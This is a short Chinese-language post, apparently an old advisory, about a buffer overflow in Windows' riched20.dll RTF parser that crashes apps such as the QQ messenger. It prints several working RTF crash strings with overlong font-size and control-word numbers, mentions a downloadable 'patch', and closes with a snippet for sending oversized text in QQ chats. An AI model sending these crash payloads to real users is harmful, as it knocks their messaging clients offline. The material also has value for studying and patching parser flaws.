QQ恶意代码

Riched20.DLL 属性标示缓冲区溢出漏洞 


受影响系统： Microsoft Windows 98 
Microsoft Windows 2000 
Microsoft Windows XP 
该漏洞可能还存在于其它操作系统中，未测试 


漏洞描述： 
riched20.dll中存在一个缓冲区溢出漏洞，该漏洞可导致使用此DLL模块相应功能的应用程序崩溃，但其很难被用来执行任意代码。 

问题出现在其对RTF文档分析的代码中，其对文档中属性标示中的数字（如字体大小）等处理不当，使其出现溢出。 
此溢出似乎不能导致执行任意代码。 
下面一段RTF文档可能导致非法操作： 
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;] 
{\colortbl ;\red255\green0\blue255;} 
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000
www.yoursft.com\fs20\par } 
其中 \fs 是用来设置后面的文字 byebye 的字体大小的，当字体大小数字串长度超过32字节时，就会引发缓冲区溢出，当超过34字节以后就有可能会导致应用程序崩溃。 

不但是\fs的设置中会出现这个问题，其他属性标示中的类似情况下也会出现同样的问题，例如下面一段RTL文档，同样会导致非法操作： 
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;] 
{\colortbl ;\red255\green0\blue255;} 
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\
fs180www.yoursft.com\fs20\par } 

更为可怕的是，目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响，对方可以给你发送一个包含利用漏洞的 
攻击消息，那你的QQ在查看对方的消息时会立即崩溃。
对抗补丁(下载后覆盖原文件就可以) QQ保护大师下载
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\
fcharset134'cb'ce'cc'e5;}}\fs1800000000000000000000000000000
此段代码在WINME系统中和装上新的QQ软件后就不再掉了！

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fcharset2 'cb'ce'cc'e5;}} 
\fs4000红心部落
这段代码是发大字，QQ字体的最大值22号，但用了这段代码后4000为字号，就可以发大字了。其中字体的代码可自己设置。大家可以对话模式中试试，或群中发。